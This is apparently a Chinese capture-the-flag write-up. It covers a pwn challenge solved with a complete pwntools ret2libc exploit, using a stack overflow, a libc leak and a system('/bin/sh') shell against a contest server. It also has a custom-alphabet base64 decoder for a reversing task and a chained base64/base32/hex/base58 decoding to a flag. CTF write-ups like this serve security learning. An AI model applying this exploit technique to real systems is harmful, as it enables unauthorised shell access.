pwn - ret2 temp
一開始記得不是這個題目名字,應該是 ret2dl-resolve ,高大上東西不會
分析
保護情況
32 位動態鏈接;打開 NX ;
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
漏洞函數
read 函數棧溢出
ssize_t vuln()
{
char buf; // [esp+Ch] [ebp-6Ch]
setbuf(stdin, &buf);
return read(0, &buf, 0x100u);
}
思路
泄露 libc
棧溢出,用 write 泄露 libc 地址:
payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
get shell
到 libc-database 查遠程的 libc 是:libc6-i386_2.23-0ubuntu11_amd64.so 。
payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(system) + p32(0xdeadbeef) + p32(binsh)
exp
from pwn import *
context.log_level = 'debug'
#p = process("./pwn")
p = remote("118.31.11.216",36666)
elf = ELF("./pwn")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc = ELF("./libc.so")
main_addr = 0x0804851f
write_plt = elf.plt['write']
log.info("write_plt:"+hex(write_plt))
write_got = elf.got['write']
log.info("write_got:"+hex(write_got))
payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.recvuntil("!\n")
p.send(payload)
write_leak = u32(p.recv(4))
log.info("write_leak:"+hex(write_leak))
libc_base = write_leak - libc.symbols['write']
log.info("libc_base:"+hex(libc_base))
system = libc_base + libc.symbols['system']
log.info("system:"+hex(system))
binsh = libc_base + libc.search('/bin/sh').next()
log.info("binsh:"+hex(binsh))
#onegadget = 0x3ac5c + libc_base
#log.info("onegadget:"+hex(onegadget))
payload = 'a'*0x6c+p32(0xdeadbeef)
#payload += p32(0x08048362) + p32(onegadget)
payload += p32(system) + p32(0xdeadbeef) + p32(binsh)
p.recvuntil("!\n")
#gdb.attach(p)
p.send(payload)
p.interactive()
RE - 貌似有些不對
上面字符串 base 加密,下面自定義 自定義密碼錶 :
解密腳本:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : MrSkYe
# @Email : [email protected]
# @File : base_diy.py
# 自定義加密表
#s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"#原版
s = "ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/"#自定義
def My_base64_encode(inputs):
# 將字符串轉化爲2進制
bin_str = []
for i in inputs:
x = str(bin(ord(i))).replace('0b', '')
bin_str.append('{:0>8}'.format(x))
#print(bin_str)
# 輸出的字符串
outputs = ""
# 不夠三倍數,需補齊的次數
nums = 0
while bin_str:
#每次取三個字符的二進制
temp_list = bin_str[:3]
if(len(temp_list) != 3):
nums = 3 - len(temp_list)
while len(temp_list) < 3:
temp_list += ['0' * 8]
temp_str = "".join(temp_list)
#print(temp_str)
# 將三個8字節的二進制轉換爲4個十進制
temp_str_list = []
for i in range(0,4):
temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))
#print(temp_str_list)
if nums:
temp_str_list = temp_str_list[0:4 - nums]
for i in temp_str_list:
outputs += s[i]
bin_str = bin_str[3:]
outputs += nums * '='
print("Encrypted String:\n%s "%outputs)
def My_base64_decode(inputs):
# 將字符串轉化爲2進制
bin_str = []
for i in inputs:
if i != '=':
x = str(bin(s.index(i))).replace('0b', '')
bin_str.append('{:0>6}'.format(x))
#print(bin_str)
# 輸出的字符串
outputs = ""
nums = inputs.count('=')
while bin_str:
temp_list = bin_str[:4]
temp_str = "".join(temp_list)
#print(temp_str)
# 補足8位字節
if(len(temp_str) % 8 != 0):
temp_str = temp_str[0:-1 * nums * 2]
# 將四個6字節的二進制轉換爲三個字符
for i in range(0,int(len(temp_str) / 8)):
outputs += chr(int(temp_str[i*8:(i+1)*8],2))
bin_str = bin_str[4:]
print("Decrypted String:\n%s "%outputs)
print()
print(" *************************************")
print(" * (1)encode (2)decode *")
print(" *************************************")
print()
num = input("Please select the operation you want to perform:\n")
if(num == "1"):
input_str = input("Please enter a string that needs to be encrypted: \n")
My_base64_encode(input_str)
else:
input_str = input("Please enter a string that needs to be decrypted: \n")
My_base64_decode(input_str)
Crypto - 真·簽到
給的一個程序,運行不起來,IDA 打開就很奇怪,然後隨手往記事本一帶,發現一串字符串。看這樣子像是 base 64 :
R00yVE1NWlRIRTJFRU5CWUdVM1RNUlJURzRaVEtOUllHNFpUTU9CV0lJM0RRTlJXRzQ0VE9OSlhHWTJET05aUkc1QVRPTUJUR0kyRUVNWlZHNDNUS05aWEc0MlRHTkpaR1pBVElNUldHNDNUT05KVUc0M0RPTUJXR0kyRUtOU0ZHTTRUT09CVUc0M0VFPT09Cgo=
加密之後長這樣:
GM2TMMZTHE2EENBYGU3TMRRTG4ZTKNRYG4ZTMOBWII3DQNRWG44TONJXGY2DONZRG5ATOMBTGI2EEMZVG43TKNZXG42TGNJZGZATIMRWG43TONJUG43DOMBWGI2EKNSFGM4TOOBUG43EE===
然後聯想 base 32 的佔位符(也就是 = )的可能是 6、4、3、1 個,又順手解密後:
3563394B48576F37356873686B686679757647717A70324B3577577753596A426777547670624E6E3978476B
然後就是 16 進制轉換字符串:
5c9KHWo75hshkhfyuvGqzp2K5wWwSYjBgwTvpbNn9xGk
然後再轉一個 base 58 :
Dozerctf{base_family_is_so_good}
其實這種多重加密,用 CyberChef 能自動解出來一部分,這題的最後兩步就是自動解出來的:
點擊下面鏈接可以查看整個解密流程:
https://skyedai910.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Hex('None')From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)&input=UjAweVZFMU5XbFJJUlRKRlJVNUNXVWRWTTFSTlVsSlVSelJhVkV0T1VsbEhORnBVVFU5Q1YwbEpNMFJSVGxKWFJ6UTBWRTlPU2xoSFdUSkVUMDVhVWtjMVFWUlBUVUpVUjBreVJVVk5XbFpITkROVVMwNWFXRWMwTWxSSFRrcGFSMXBCVkVsTlVsZEhORE5VVDA1S1ZVYzBNMFJQVFVKWFIwa3lSVXRPVTBaSFRUUlVUMDlDVlVjME0wVkZQVDA5Q2dvPQ